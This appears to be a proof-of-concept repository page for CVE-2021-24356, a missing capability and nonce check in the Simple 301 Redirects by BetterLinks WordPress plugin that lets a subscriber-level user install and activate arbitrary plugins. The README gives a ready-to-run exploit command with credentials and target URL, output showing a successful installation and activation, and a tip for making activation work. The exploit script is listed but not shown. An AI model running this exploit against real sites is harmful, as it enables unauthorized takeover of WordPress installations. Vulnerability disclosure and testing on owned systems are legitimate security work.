CVE-2021-24356 PoC — BetterLinks WordPress plugin access control error vulnerability

Source
Associated Vulnerability
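Title: BetterLinks WordPress plugin access control error vulnerability (CVE-2021-24356)
Description: WordPress is a blogging platform developed in PHP by the WordPress Foundation. The platform supports setting up personal blog sites on servers running PHP and MySQL. BetterLinks WordPress plugin versions before 2.0.4 contain a security vulnerability that stems from a lack of checks; an attacker can exploit it to activate arbitrary plugin installations.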
Description
Simple 301 Redirects by BetterLinks - 2.0.0 – 2.0.3 - Subscriber + Arbitrary Plugin Installation
Readme
# CVE-2021-24356
Simple 301 Redirects by BetterLinks - 2.0.0 – 2.0.3 - Subscriber + Arbitrary Plugin Installation

# Description
A lack of capability checks and an insufficient nonce check on the plugin's AJAX action made it possible for authenticated users to install arbitrary plugins on vulnerable sites.

How to use
----

```
$ python3 CVE-2021-24356.py --url http://wordpress.lan --username user --password useruser1 --slug betterlinks
Getting REST API Nonce!
Nonce Found: dd72f43027
Installing Plugin!
{"success":true,"data":"Plugin is installed successfully!"}
Activating Plugin!
{"success":true,"data":"BetterLinks is activated!"}
```

Note: Some plugins might not activate. If that happens, change the `sluga` variable to the `path/file.php` of the plugin's main file. The script currently works well when the slug is something like `betterlinks` and the plugin's main file is called `betterlinks.php`.
File Snapshot

```
[4.0K] /data/pocs/f18da6924b55bb6ecfb9b4a819fcc0c760dd6496
├── [3.3K] CVE-2021-24356.py
├── [ 34K] LICENSE
└── [ 917] README.md

0 directories, 3 files
```